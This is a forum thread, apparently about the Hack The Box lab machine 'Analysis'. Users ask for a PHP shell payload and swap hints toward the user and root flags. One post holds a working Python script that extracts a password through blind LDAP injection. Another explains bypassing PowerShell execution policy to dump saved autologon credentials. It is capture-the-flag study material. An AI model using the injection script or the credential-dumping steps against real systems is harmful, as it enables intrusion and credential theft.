Jan 21, 2024, 08:55 AM
can anyone share php shell payload
|
Analysis - HTB
by paven - Saturday January 20, 2024 at 01:22 PM
|
|
Jan 21, 2024, 08:55 AM
can anyone share php shell payload
Jan 21, 2024, 09:02 AM
Jan 21, 2024, 09:10 AM
i am in, but how to get to the user flag?
Jan 21, 2024, 09:47 AM
https://github.com/antonioCoco/ConPtyShell i run this tool but doesn't works properly what can do ?
Jan 21, 2024, 09:50 AM
how are you guys logging in (where) using the technician password
Jan 21, 2024, 10:00 AM
Jan 21, 2024, 10:01 AM
could need a little hint...i /private/encoded.txt a rabbit hole?
if not - how to deal with it? (Jan 21, 2024, 06:40 AM)qxuarpcy Wrote:(Jan 21, 2024, 06:38 AM)jyosun Wrote:(Jan 21, 2024, 06:30 AM)qxuarpcy Wrote:(Jan 21, 2024, 06:09 AM)jyosun Wrote:(Jan 21, 2024, 06:02 AM)qxuarpcy Wrote: got user, any hint for root I got credentias, and uploaded RunCs.exe to box. Using RunasCs I can read files as webservice ... but I cannot find the jdoe credentials
Jan 21, 2024, 11:11 AM
code:
import requests import urllib.parse charset = "/usr/share/seclists/Fuzzing/alphanum-case-extra.txt" url_template = "http://internal.analysis.htb/users/list.php?name=*)(%26(objectClass=user)(description={}*)" clair = "" while True: with open(charset, "r") as charset_file: for char in charset_file.read(): clair_with_char = clair + char clair_encoded = urllib.parse.quote(clair_with_char) s = url_template.format(clair_encoded) print("Trying URL:", s) response = requests.get(s) if "technic" in response.text: clair += char print(clair) break when your code is looped try add char "*" mannually (Jan 21, 2024, 10:57 AM)bsbsmaster Wrote: i cant understand how did u get the password for the user i tried so many ways any hint that can might help me i tried the script and brute force and i tried to change the script url didnt workIf you got shell then you can do further enumeration to find out user credentials. It's autologon functionality, saved winlogon credential. Use this tool - https://github.com/itm4n/PrivescCheck - bypass the powershell exec restriction, run it, analyze the report it dumps... there you have it... |
|
« Next Oldest | Next Newest »
|
| Possibly Related Threads… | |||||
| Thread | Author | Replies | Views | Last Post | |
| Hack the box Pro Labs, VIP, VIP+ 1 month free Method | 23 | 2,170 |
1 hour ago Last Post: kkkato |
||
| [FREE] HackTheBox Academy - CBBH CDSA CPTS All Modules Flags | 20 | 2,491 |
Yesterday, 11:06 PM Last Post: op334 |
||
|
|
[FREE] HackTheBox All Cheatsheets | 3 | 396 |
Yesterday, 10:36 PM Last Post: op334 |
|
| [FREE] 300+ Writeups PDF HackTheBox/HTB premium retired | 369 | 92,003 |
Yesterday, 04:10 PM Last Post: sabbyahmed |
||
| CBBH Write Ups | 22 | 6,226 |
Yesterday, 06:39 AM Last Post: Usercomplex |
||